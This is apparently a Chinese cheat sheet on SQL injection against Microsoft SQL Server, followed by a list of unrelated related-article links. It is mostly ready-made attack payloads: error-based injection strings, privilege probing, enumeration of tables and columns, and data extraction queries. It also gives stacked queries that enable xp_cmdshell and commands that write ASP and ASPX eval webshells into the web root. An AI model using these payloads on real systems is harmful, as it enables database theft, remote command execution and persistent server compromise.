MSsql数据库 sql注入

  • 和mysql不同;每个数据库都有自己的信息总结表

  • 四个系统数据库

    • master

      • sysdatabases :所有数据库信息
        • name :所有数据库名
      • sysobjects :数据库所有对象的信息
      • syscolumns :字段信息
      • 固定字段名

        • name 对象名
        • id 对象id
        • xtype 对象类型代码

          • xtype='U' 用户创建的表
          • xtype='S' 系统表
    • model

      • sysobjects
      • syscolumns
    • msdb

      • sysobjects
      • syscolumns
    • tempdb

      • sysobjects
      • syscolumns
  • 用户自己创建的数据库也会自动携带下面字段

    • sysobjects
    • syscolumns
  • 常用函数

    • db_name() :数据库名
    • host_name() :主机名
    • current_user :返回数据库当前的用户名
    • user :用户
    • substring() :截取函数;不能用substr()
    • @@verison :查看数据库版本
    • char() :ascii码转字符
    • cast(text as type() :字符类型转换;转化失败就会以text结果显示在页面上
    • object_id() :根据表名返回数据库表名id
    • object_name() :根据id返回数据库表名
    • col_name(object_id,column_id) :返回指定表中指定字段的名称
    • col_name(object_id('users'),2)
  • 调用表名

    • 数据库名.用户名.表名
  • 报错注入

    • 'or 1=convert(int,@@version)--
    • 1-user
    • 1/user
    • convert(int,user)
    • db_name()
  • 注入流程

    • 判断权限

      • 权限:sa 、db_owner 、public
      • and 1=(select IS_SRVROLEMEMBER('sysadmin')) --
      • and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
      • and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
      • and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
      • and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
      • and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
      • and 1=(select IS_MEMBER('db_owner'));-
    • 获取当前数据库
      • and 1=(select db_name()) --
    • 获取当前数据库的表名
      • and 1=convert(int,(select quotename(name) from 数据库名..sysobjects where xtype='U' FOR XML PATH(''))) --
    • 获取当前数据库中表的所有字段
      • and 1=(select quotename(name) from 数据库名..syscolumns where id =(select id from 数据库名..sysobjects where name='指定表名') FOR XML PATH(''))--
    • 读取内容
      • and 1=(select top 1 * from 指定数据库..指定表名 where排除条件 FOR XML PATH(''))--
  • 命令执行

    • 开启xp_cmdshell,0为关闭,1为开启
      • ;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE; --
    • 关闭xp_cmdshell
      • ;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',0;RECONFIGURE; --
    • 执行ping判断是否能执行xp_cmdshell和服务器是否通外网

      • ;execute('xp_cmdshell ""')
    • 写入一句话木马;需要知道网站根目录

      • asp
        • ;exec master..xp_cmdshell 'echo ^<%25eval request(1234)%25^> > C:\Inetpub\wwwroot\test.asp' --
      • aspx
        • ;exec master..xp_cmdshell 'echo ^<%25@ Page Language="Jscript"%25^>^<%25eval(Request.Item["aaa"],"unsafe");%25^> > C:\Inetpub\wwwroot\test.aspx' --
相关推荐
Arva .11 分钟前
Redis
数据库·redis·缓存
DemonAvenger12 分钟前
MySQL与应用程序的高效交互模式:从基础到实战的最佳实践
数据库·mysql·性能优化
博一波28 分钟前
Redis 集群:连锁银行的 “多网点智能协作系统”
数据库·redis·缓存
HashData酷克数据34 分钟前
官宣:Apache Cloudberry (Incubating) 2.0.0 发布!
数据库·开源·apache·cloudberry
秋难降35 分钟前
SQL 索引突然 “罢工”?快来看看为什么
数据库·后端·sql
TDengine (老段)1 小时前
TDengine 时间函数 TODAY() 用户手册
大数据·数据库·物联网·oracle·时序数据库·tdengine·涛思数据
码界奇点1 小时前
KingbaseES一体化架构与多层防护体系如何保障企业级数据库的持续稳定与弹性扩展
数据库·架构·可用性测试
悟乙己2 小时前
数据科学家如何更好地展示自己的能力
大数据·数据库·数据科学家
皆过客,揽星河2 小时前
mysql进阶语法(视图)
数据库·sql·mysql·mysql基础语法·mysql进阶语法·视图创建修改删除
tuokuac3 小时前
Redis 的相关文件作用
数据库·redis·缓存